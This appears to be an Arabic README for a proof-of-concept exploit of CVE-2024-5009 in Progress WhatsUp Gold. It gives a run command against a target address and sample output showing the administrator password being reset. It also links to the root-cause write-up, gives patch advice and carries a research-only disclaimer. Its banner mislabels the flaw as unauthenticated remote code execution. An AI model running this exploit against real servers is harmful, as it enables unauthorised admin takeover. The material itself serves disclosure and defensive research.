
استغلال لـ CVE-2024-5009
PoC لاستغلال ثغرة تصعيد الامتيازات SetAdminPassword في Progress WhatsUp Gold (CVE-2024-5009)
يمكن الاطلاع على تحليل السبب الجذري للثغرة في مدونتي: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/
python3 CVE-2024-5009.py --target https://192.168.0.231/
_______ _ _ _______ _______ _____ __ _ _____ __ _ ______ _______ _______ _______ _______
|______ | | | | | | | | | | | \ | | | \ | | ____ | |______ |_____| | | |
______| |_____| | | | | | | |_____| | \_| __|__ | \_| |_____| . | |______ | | | | |
(*) Progress WhatsUp Gold GetFileWithoutZip Unauthenticated Remote Code Execution (CVE-2024-5009)
(*) Exploit by Sina Kheirkhah (@SinSinology) of SummoningTeam (@SummoningTeam)
(*) Technical details: https://summoning.team/blog/progress-whatsup-gold-privesc-setadminpassword-cve-2024-5009/
(^_^) Prepare for the Pwnage (^_^)
(*) Generated random password is: e9513bc41e2a9acf
(*) Escalating...
(+) Escalation done, new admin password is: e9513bc41e2a9acf
قم بالتحديث إلى أحدث إصدار أو خفّف من المخاطر باتباع التعليمات الواردة في نشرة Progress الأمنية
أُنشئ هذا البرنامج لأغراض البحث الأكاديمي وتطوير تقنيات دفاعية فعّالة فقط، وليس الغرض منه استخدامه لمهاجمة الأنظمة إلا عند التصريح بذلك صراحةً. لا يتحمّل القائمون على المشروع أي مسؤولية عن إساءة استخدام البرنامج. استخدمه بمسؤولية.